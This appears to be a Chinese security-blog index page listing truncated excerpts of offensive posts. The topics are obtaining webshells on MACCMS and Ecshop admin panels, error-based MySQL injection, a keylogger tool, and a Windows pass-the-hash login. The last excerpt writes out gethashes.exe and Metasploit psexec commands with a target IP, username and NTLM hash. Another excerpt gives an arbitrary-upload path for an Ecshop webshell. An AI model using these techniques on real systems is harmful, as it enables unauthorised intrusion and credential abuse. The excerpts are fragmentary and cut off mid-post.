MACCMS PHP版突破安全狗后台拿webshell
基于错误回显的SQL注入笔记 0x00 关于错误回显 用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。 0x01 用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充) 第一种: 基于 rand() 与 group by 的错误 首先看一下关于rand()函数与group by 在mysql中的错误报告,没错,我们就是要利用group by... Ecshop后台拿shell方法总结 方法一:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.php] 方法二:另外一种是利用ecshop后台的数据库备份功能 这里选择自定义备份,目的是使你备份出来的文件尽量的小,要是太大的话也很麻烦。 然后去前台留个言,内容是我们... 猥琐之老外的键盘记录器 描述 Kelogger 24 -是一个全功能的应用程序来记录击键。 特性
使用Hash直接登录Windows 使用gethashes.exe 获取本地hash: [cce]gethashes.exe $local[/cce] 使用msf中的psexec来hash登陆: [cce] use exploit/windows/smb/psexec show options set RHOST 192.168.1.9(靶机IP) set SMBUser molok(获取的用户名) set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537(获取的hash) exploit [/cce] 逛乌云... |
|